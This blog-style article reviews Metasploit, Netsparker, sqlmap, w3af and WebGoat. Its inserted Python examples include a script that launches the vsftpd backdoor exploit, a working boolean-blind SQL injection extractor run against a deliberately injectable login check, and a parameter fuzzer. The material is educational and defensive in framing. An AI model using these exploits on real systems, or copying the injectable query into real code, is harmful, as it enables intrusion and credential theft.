Exploitation Tools (part 2)

In this second article we continue to look at the exploitation tools available for Pentesting and Ethical Hacking. We examine the last 5 of the choices in our Best Exploitation Tool poll to understand what each one does, its main features, some examples of it in use, and where to find out more about it.

Metasploit

…Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

metasploit.com

MSF (Metasploit Framework) is the free, open source edition aimed at developers and security researchers, whilst Metasploit Pro is the commercial edition aimed at penetration testers and IT security teams.

Both editions share the same module library (1500+ exploits at the time of writing). Pro adds a web interface and automation of the exploitation workflow; the free edition is driven from the command line (the ‘msfconsole’ CLI) with each module selected, configured and run by hand.

Example of ‘msfconsole’ (Metasploit Framework CLI) startup, loading an FTP exploit and setting the options.
Example of loading a SAMBA networking exploit, setting options and listing possible payloads.
Continuation of previous screen showing the remaining payloads and additional options for the loaded exploit.
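The screenshots above show the manual msfconsole workflow: select a module, set its options, list the available payloads, pick one, check the effective options and run. The following is an added example, not code from the article or from Metasploit, that renders exactly that command sequence as a resource script which msfconsole can replay with `msfconsole -q -r file.rc`. The module path `exploit/unix/ftp/vsftpd_234_backdoor` and payload `cmd/unix/interact` are real Metasploit identifiers chosen for illustration (the article does not say which FTP exploit its screenshot shows), and `10.0.0.5` is a placeholder for a lab host you are authorised to test.

```python
import re

# Added example (not the article's or Metasploit's code): turn the
# use / set / show payloads / set PAYLOAD / show options / run sequence
# into a resource script that can be replayed with "msfconsole -q -r".

# Every line of a resource script is a console command, and <ruby>...</ruby>
# blocks inside one are executed as Ruby, so an option value that carries a
# newline or angle brackets could smuggle extra commands into the run.
# Only the characters that module options actually need are allowed through.
_SAFE = re.compile(r"[A-Za-z0-9_./:,\-]+")


def _checked(kind, text):
    """Return text as a string, or refuse it if it could break out of one command line."""
    text = str(text)
    if not _SAFE.fullmatch(text):
        raise ValueError(f"refusing to embed {kind} {text!r} in a resource script")
    return text


def build_resource_script(module, options, payload=None):
    """Return the resource-script text for one module run.

    module  -- e.g. "exploit/unix/ftp/vsftpd_234_backdoor" (assumed identifier)
    options -- dict of console options, e.g. {"RHOSTS": "10.0.0.5", "RPORT": 21}
    payload -- optional payload path, e.g. "cmd/unix/interact"
    """
    module = _checked("module", module)
    if not module.startswith(("exploit/", "auxiliary/")):
        raise ValueError(f"not an exploit or auxiliary module: {module!r}")

    lines = [f"use {module}"]
    for name, value in options.items():
        lines.append(f"set {_checked('option name', name)} {_checked('option value', value)}")
    lines.append("show payloads")          # same listing as the second screenshot
    if payload is not None:
        lines.append(f"set PAYLOAD {_checked('payload', payload)}")
    lines += [
        "show options",                   # confirm RHOSTS/RPORT/LHOST before firing
        "check",                          # modules without a check method just say so
        "run -z",                         # run, but do not drop into the session
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Placeholder lab target; module and payload names are real but assumed here.
    print(build_resource_script(
        "exploit/unix/ftp/vsftpd_234_backdoor",
        {"RHOSTS": "10.0.0.5", "RPORT": 21},
        payload="cmd/unix/interact",
    ))
```

Save the output as, say, `ftp.rc` and replay it with `msfconsole -q -r ftp.rc`. The character whitelist is the point worth keeping: resource scripts are executed line by line, so if option values ever come from an untrusted source (an imported host list from a scanner, for instance) they must not be able to add commands of their own.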

For further details on Metasploit check out the following resources:

Netsparker

Netsparker is a web vulnerability management solution that focuses on scalability, automation, and integration. Based on a leading-edge web vulnerability scanner, the Netsparker platform uses proprietary Proof-Based Scanning™ technology to identify and confirm vulnerabilities, confidently indicating results that are definitely not false positives. Netsparker is highly effective both integrated within the SDLC and as a stand-alone solution.

netsparker.com

There are 3 versions of this commercial product:

  • Netsparker Standard: Powerful yet user-friendly – the best web application security scanner for small and medium businesses.
  • Netsparker Team: The most accurate cloud-based scanner for medium to large organizations.
  • Netsparker Enterprise: The only web application scanner that scales to meet the needs of the largest organizations in the world.
Example of Global Dashboard in Netsparker Enterprise edition.
Example of Scan Activity pane.
Example of Viewing Issues in Netsparker Standard edition.

For further details on Netsparker check out the following resources:

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap.org

Features:

  • Full support for IBM DB2, MS Access, MS SQL Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase plus others.
  • 6 SQL injection techniques: boolean-blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

There are many other features, as described on sqlmap.org.

Example screen of ‘sqlmap’ courtesy of sqlmap.org
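To make the boolean-based blind technique from the feature list concrete, here is an added example, not sqlmap's own code, that recovers a password hash from a constructed in-memory SQLite database through a deliberately injectable login check. The attacker only ever sees a yes/no answer (row found or not), which is exactly the oracle sqlmap's boolean-based blind mode works with; the same block shows the parameterised query that defeats the identical input. The `users` table, the user `alice` and her hash are made up for the example.

```python
import sqlite3

# Added example (not sqlmap's code): boolean-based blind SQL injection worked
# end to end against a constructed in-memory database, to show the mechanics
# that sqlmap automates. Table contents below are made up.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
    INSERT INTO users (name, pw_hash)
        VALUES ('alice', '5f4dcc3b5aa765d61d8327deb882cf99');
""")

REQUESTS = {"count": 0}   # stand-in for the number of HTTP requests sent


def vulnerable_user_exists(username):
    """Deliberately injectable: the username is concatenated into the SQL.
    The caller learns only True/False, never the row contents."""
    REQUESTS["count"] += 1
    sql = f"SELECT id FROM users WHERE name = '{username}'"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_user_exists(username):
    """Hardened form: a bound parameter, so the input can never change the query."""
    row = _db.execute("SELECT id FROM users WHERE name = ?", (username,)).fetchone()
    return row is not None


def oracle(condition):
    """Ask the application a yes/no question by appending it to a known-true
    WHERE clause; the trailing comment swallows the original closing quote."""
    return vulnerable_user_exists(f"alice' AND ({condition}) -- ")


def blind_extract(expr, max_len=64):
    """Recover the string value of an SQL expression one character at a time.
    Each character is found by binary search over its code point, so about
    7 requests per character instead of one request per candidate."""
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break                      # ran off the end of the string
        lo, hi = 0, 127                # printable ASCII is enough for a hex digest
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        value += chr(lo)
    return value


# Any SQL expression can be extracted; here, one user's stored hash.
ALICE_HASH = "(SELECT pw_hash FROM users WHERE name = 'alice')"

if __name__ == "__main__":
    print(blind_extract(ALICE_HASH), "recovered in", REQUESTS["count"], "requests")
```

Running it prints the 32-character hash and a request count of roughly 260 (8 questions per character). Multiply that by real network latency and it is clear why sqlmap prefers UNION-based or error-based injection when the target permits them, and why it offers the `--threads` switch for the blind techniques. Note that `safe_user_exists("alice' AND (1=1) -- ")` simply looks for a user with that literal name and finds none.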

For further details on sqlmap check out the following resources:

w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

w3af.org

Features:

  • Daemons – framework implements web & proxy servers.
  • Fast HTTP Client – offers proxy support, HTTP Basic & Digest authentication, UserAgent faking, custom request headers, cookie handling, HTTP response cache, DNS cache, and Multipart file upload.
  • Output Manager – output can be written to Console, files (Text, CSV, HTML & XML formats), and Email.
  • Fuzzing Engine – for injecting payloads into every part of the HTTP request.
  • Knowledge base – central location for storing and sharing vulnerabilities, information disclosures, and other valuable items between plugins.
  • Parsing – the framework tries to parse HTML to extract links & forms found during the crawl.
Example of Scan Config screen courtesy of w3af.org
Example of Log screen courtesy of w3af.org
Example of Exploit screen courtesy of w3af.org
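As an added illustration of the Parsing and Fuzzing Engine features above (not w3af's own code), the following parses a constructed HTML page for links and forms, then generates one mutated request per injection point, which is the crawl-then-audit loop in miniature. The base URL `https://example.test/`, the sample page and the payload string are assumptions made for the example; only the Python standard library is used.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit

# Added example (not w3af's code): extract links and forms from a page, then
# build one request per parameter with a payload substituted in. The HTML
# below is constructed for the example.
SAMPLE_HTML = """
<html><body>
<a href="/search?q=shoes&page=2">results</a>
<a href="https://example.test/about">about</a>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="hidden" name="csrf" value="abc123">
  <input type="submit" value="Go">
</form>
</body></html>
"""


class LinkFormParser(HTMLParser):
    """Collect absolute <a href> targets and <form> definitions (action, method, inputs)."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base_url, a["href"]))
        elif tag == "form":
            self._form = {
                "action": urljoin(self.base_url, a.get("action", "")),
                "method": (a.get("method") or "get").lower(),
                "inputs": {},
            }
        elif tag == "input" and self._form is not None and a.get("name"):
            if (a.get("type") or "text").lower() == "submit":
                return                     # submit buttons are not injection points
            self._form["inputs"][a["name"]] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def fuzz_requests(parsed, payload):
    """Return (method, url, body) tuples with the payload placed in ONE parameter
    at a time, so a reflected or injected response can be blamed on a single point."""
    out = []
    for link in parsed.links:
        parts = urlsplit(link)
        params = parse_qsl(parts.query, keep_blank_values=True)
        for i, (name, _) in enumerate(params):
            mutated = list(params)
            mutated[i] = (name, payload)
            out.append(("GET", urlunsplit(parts._replace(query=urlencode(mutated))), None))
    for form in parsed.forms:
        for name in form["inputs"]:
            data = dict(form["inputs"])    # keep the other fields (e.g. the CSRF token)
            data[name] = payload
            if form["method"] == "post":
                out.append(("POST", form["action"], urlencode(data)))
            else:
                out.append(("GET", form["action"] + "?" + urlencode(data), None))
    return out


def crawl_and_fuzz(html, base_url, payload="'\"><fuzz>"):
    """Parse one page and return (parser, list of fuzzed requests)."""
    parser = LinkFormParser(base_url)
    parser.feed(html)
    parser.close()
    return parser, fuzz_requests(parser, payload)


if __name__ == "__main__":
    _, requests_to_send = crawl_and_fuzz(SAMPLE_HTML, "https://example.test/")
    for method, url, body in requests_to_send:
        print(method, url, body or "")
```

In w3af the first half is done by the crawl plugins and the second by the audit plugins over the framework's HTTP client; the payload here is a single marker string, whereas a real audit plugin substitutes a family of payloads per vulnerability class and inspects each response for the corresponding tell.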

For further details on w3af check out the following resources:

WebGoat

WebGoat is not itself used to Penetration Test a target; it is a purposely vulnerable target application for practising the techniques and skills the other tools in this article exercise.

WebGoat is a deliberately insecure application that allows interested developers just like you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components.

WebGoat

WebGoat contains Lessons, grouped by OWASP Top 10 (2017) category, which currently include:

  • A1) Injection (intro, advanced & mitigation)
  • A2) Broken Authentication
  • A3) Sensitive Data Exposure
  • A4) XML External Entities (XXE)
  • A5) Broken Access Control
  • A7) Cross-Site Scripting (XSS)
  • A8) Insecure Deserialization
  • A9) Vulnerable Components
  • A8:2013) Request Forgeries (CSRF, which kept its category number from the 2013 list)
Register screen for WebGoat.
Start of a Lesson within WebGoat.
Part of a Lesson within WebGoat.

For further details on WebGoat check out the following resources:


If you have not yet voted in our poll then please check out the Best Exploitation Tool page.

If you have not read Part 1 of this article then please check it out.

If you have any questions or comments on the above please feel free to add them below.